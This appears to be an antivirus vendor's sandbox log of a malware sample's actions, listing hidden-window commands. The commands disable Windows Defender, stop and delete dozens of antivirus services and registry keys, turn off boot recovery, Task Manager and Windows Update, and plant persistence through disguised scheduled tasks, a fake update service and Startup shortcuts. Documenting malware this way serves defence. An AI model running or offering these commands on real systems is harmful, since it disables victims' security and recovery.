'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Avira" /f"
'<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Avira" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Avira" /f"
'<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\Avira" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\TrendMicro" /f"
'<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\TrendMicro" /f
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\TrendMicro" /f"
'<SYSTEM32>\reg.exe' delete "HKCU\SOFTWARE\TrendMicro" /f
'<SYSTEM32>\cmd.exe' /c "systeminfo"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "bcdedit /set {default} bootstatuspolicy ignoreallfailures"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "bcdedit /set {default} recoveryenabled no"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "bcdedit /set {default} advancedoptions false"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot" /v OptionValue /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true;"Set-MpPreference -DisableBehaviorMonitoring $true; Set-MpPreference -DisableBlockAtFirstSeen $true; Set-MpPreference ...' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop WinDefend"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc config WinDefend start= disabled"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "schtasks /create /tn Microsoft\Windows\WindowsUpdate\WindowsUpdateTask /xml %TEMP%\task_7793.xml /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop WdNisSvc"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "netsh advfirewall firewall add rule name="BlockWireshark" dir=in action=block protocol=TCP localport=1774,27017,27018,27019,27020"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "schtasks /create /tn "Microsoft\Windows\Application Experience\ProgramDataUpdater" /xml %TEMP%\task_3143.xml /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc config WdNisSvc start= disabled"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "schtasks /create /tn "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /xml %TEMP%\task_9091.xml /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop Sense"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "schtasks /create /tn Microsoft\Windows\Defrag\ScheduledDefrag /xml %TEMP%\task_5488.xml /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc config Sense start= disabled"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop SecurityHealthService"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "schtasks /create /tn Microsoft\Windows\Diagnosis\Scheduled /xml %TEMP%\task_1335.xml /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc config SecurityHealthService start= disabled"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc create WinUpdate3910 "binPath= \"<SYSTEM32>\svchost8325.exe\"" "type= own" "start= auto" "error= normal""' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc description WinUpdate3910 "Windows Update Service""' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell -Command " $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut(\"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Windows Update.lnk\") $S...' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "powershell -Command " $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut(\"%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\StartUp\Windows Update.l...' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_DWORD /d 1 /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete WinDefend"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete WdNisSvc"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete Sense"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete SecurityHealthService"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop kavfs"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete kavfs"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop kavfss"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete kavfss"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop klim5"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete klim5"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop kl1"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete kl1"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop klif"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete klif"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop kneps"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete kneps"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop Norton"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete Norton"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop N360"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete N360"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop NIS"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete NIS"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop NAV"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete NAV"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop nisSrv"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete nisSrv"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop McAfee"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete McAfee"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop mcshield"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete mcshield"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop mfefire"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete mfefire"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop mfemms"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete mfemms"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop avast"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete avast"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop avastsvc"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete avastsvc"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop afwServ"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete afwServ"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop AVG"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete AVG"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop avgfws"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete avgfws"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop avgwd"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete avgwd"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop avgemc"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete avgemc"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop Bitdefender"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete Bitdefender"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop bdagent"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete bdagent"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop vsserv"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete vsserv"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop ESET"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete ESET"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop ekrn"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete ekrn"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop ehdrv"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete ehdrv"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop Avira"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete Avira"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop avguard"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete avguard"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop avshadow"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete avshadow"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop Trend Micro"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete Trend Micro"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop tmccsf"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete tmccsf"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop tmlisten"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete tmlisten"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop Malwarebytes"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete Malwarebytes"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop MBAMService"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete MBAMService"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop MBEndpointAgent"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete MBEndpointAgent"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop Comodo"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete Comodo"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop cmdagent"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete cmdagent"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop cavwp"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete cavwp"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop Panda"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete Panda"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop psanhost"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete psanhost"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop pavsrv"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete pavsrv"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop Webroot"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete Webroot"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop wrsssdk"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete wrsssdk"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop wrcoreservice"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete wrcoreservice"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop BullGuard"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete BullGuard"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop bullguardservice"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete bullguardservice"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop F-Secure"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete F-Secure"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop fshoster"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete fshoster"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop fsma"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete fsma"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop Sophos"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete Sophos"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop savservice"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete savservice"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc stop swi_service"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "sc delete swi_service"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\KasperskyLab" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\KasperskyLab" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Norton" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Norton" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\McAfee" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\McAfee" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Avast" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Avast" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\AVG" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\AVG" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Bitdefender" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Bitdefender" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\ESET" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\ESET" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\Avira" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\Avira" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKLM\SOFTWARE\TrendMicro" /f"' (with hidden window)
'<SYSTEM32>\cmd.exe' /c "reg delete "HKCU\SOFTWARE\TrendMicro" /f"' (with hidden window)

テクノロジー

用語

トレーニングコースおよび啓蒙プロジェクト

アンチウイルスに関する誤解と噂

Technical Information

Curing recommendations

Free trial